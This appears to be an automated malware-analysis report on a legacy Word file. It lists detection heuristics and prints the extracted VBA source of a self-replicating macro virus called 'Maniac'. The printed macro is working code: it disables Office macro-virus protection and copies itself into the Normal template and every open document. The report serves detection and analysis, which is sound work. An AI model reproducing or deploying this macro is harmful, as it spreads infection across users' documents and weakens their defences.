MALICIOUS
156
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros that disable macro virus protection and attempt to copy themselves to the Normal template and other open documents. This behavior is indicative of a macro-based malware designed for persistence and propagation. The critical heuristic firing for VBA macro-virus self-replication strongly supports this assessment.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Application.Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 75,776 bytes but its declared streams total only 44,762 bytes — 31,014 bytes (41%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1584 bytes |
SHA-256: aeb952745f44909bf8e9af86a5a232404cae724e600cc883fce003dfed37b922 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Maniac"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "ºêÔÚ 99-05-05 ÓÉ Administrator ´´½¨"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
MacroCopy "open"
End Sub
Sub AutoNew()
MacroCopy "new"
End Sub
Sub AutoClose()
MacroCopy "close"
End Sub
Sub MacroCopy(ctype)
Application.Options.VirusProtection = False
TExist = 0
'For Each xItem In NormalTemplate.VBProject.VBComponents
For Each xitem In NormalTemplate.VBProject.VBComponents
'If xitem.Type = vbext_ct_StdModule Then Count = Count + 1
If xitem.Name = "Maniac" Then TExist = 1
Next xitem
If TExist = 0 Then _
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Maniac", Object:=wdOrganizerObjectProjectItems
For Each openDoc In Documents
'MsgBox openDoc.FullName
DExist = 0
For Each xitem In openDoc.VBProject.VBComponents
If xitem.Name = "Maniac" Then DExist = 1
Next xitem
If DExist = 0 Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=openDoc.FullName, Name:="Maniac", Object:=wdOrganizerObjectProjectItems
If ctype = "open" Then openDoc.Save
End If
Next openDoc
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.